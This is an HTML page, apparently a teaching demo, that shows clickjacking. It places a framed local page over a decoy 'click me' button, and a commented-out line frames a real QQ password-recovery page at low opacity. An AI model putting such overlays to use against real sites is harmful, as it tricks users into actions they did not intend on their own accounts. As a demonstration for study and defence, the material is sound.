<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="referrer" content="never">
    <title>点击劫持</title>
    <style>
        #click{
            background: #FF0000;
            color: #ffffff;
            font-size: 20px;
            text-align: center;
            line-height: 50px;
            width: 100px;
            height: 50px;
            position: absolute;
            left: 400px;
            top: 800px;
        }
    </style>
</head>
<body>
<!--<iframe src="https://aq.qq.com/cn2/findpsw/pc/pc_find_pwd_input_account?source_id=1035" frameborder="0" width="1000" height="600" style="opacity: 0.3;position: absolute;z-index: 99;"></iframe>-->
<iframe src="http://127.0.0.1:3000/jacked" rel="noreferrer" frameborder="0" style="top:500px;opacity: 1;position: absolute;z-index: 99;"></iframe>
<h1>这是一个对用户进行点击劫持的页面</h1>
<p>你在这里看到的东西和你点到的东西是不一样的哦~</p>
<div id="click">点我~</div>
</body>
</html>